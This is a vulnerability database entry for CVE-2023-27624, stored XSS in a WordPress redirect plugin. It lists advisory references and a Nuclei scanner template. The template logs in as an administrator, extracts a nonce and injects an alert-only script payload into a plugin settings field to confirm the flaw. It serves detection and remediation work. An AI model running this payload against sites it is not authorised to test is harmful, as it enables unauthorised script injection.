| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-27624 | 19 Dec 202503:08 | – | circl | |
| WordPress Plugin Marcelotorres Redirect After Login 跨站脚本漏洞 | 13 Jun 202300:00 | – | cnnvd | |
| CVE-2023-27624 | 13 Jun 202315:04 | – | cve | |
| CVE-2023-27624 WordPress Redirect After Login Plugin <= 0.1.9 is vulnerable to Cross Site Scripting (XSS) | 13 Jun 202315:04 | – | cvelist | |
| EUVD-2023-31360 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-27624 | 13 Jun 202316:15 | – | nvd | |
| CVE-2023-27624 | 13 Jun 202316:15 | – | osv | |
| WordPress Redirect After Login Plugin <= 0.1.9 is vulnerable to Cross Site Scripting (XSS) | 21 Apr 202300:00 | – | patchstack | |
| Cross site scripting | 13 Jun 202316:15 | – | prion | |
| PT-2023-21263 | 13 Jun 202300:00 | – | ptsecurity |
id: CVE-2023-27624
info:
name: WordPress Redirect After Login <= 0.1.9 - Admin Stored XSS
author: 0x_Akoko
severity: medium
description: |
Marcelotorres Redirect After Login plugin <= 0.1.9 contains a stored cross-site scripting caused by insufficient sanitization in the login redirect parameter, letting attackers execute scripts in the context of the affected site, exploit requires admin privileges.
impact: |
Attackers can execute malicious scripts in the context of the affected site, potentially leading to session hijacking or defacement.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://patchstack.com/database/vulnerability/redirect-after-login/wordpress-redirect-after-login-plugin-0-1-9-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-27624
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
cvss-score: 5.9
cve-id: CVE-2023-27624
cwe-id: CWE-79
epss-score: 0.00619
epss-percentile: 0.45331
cpe: cpe:2.3:a:redirect_after_login_project:redirect_after_login:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: redirect_after_login_project
product: redirect_after_login
framework: wordpress
tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: status
status:
- 200
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{BaseURL}}/wp-admin/&testcookie=1
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(all_headers, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/options-general.php?page=mtral HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Redirect After Login")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'name="_wpnonce" value="([a-f0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=mtral_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dmtral&mtral_settings%5Bmtral_field_administrator%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_administrator%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&mtral_settings%5Bmtral_field_editor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_editor%5D=&mtral_settings%5Bmtral_field_author%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_author%5D=&mtral_settings%5Bmtral_field_contributor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_contributor%5D=&mtral_settings%5Bmtral_field_subscriber%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_subscriber%5D=&submit=Save+Changes
- |
GET /wp-admin/options-general.php?page=mtral HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value=""><img src=x onerror=alert(document.domain)>"'
- 'mtral_field_custom_url_administrator'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022100e2048eb8d1975397de33e2e37287c37652f5f67373bcf46716070a39fee232f60220530e49bd42c7eaa4e51ab84c187bccb7757efa5526c11bd37f73ccd9675ace26:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation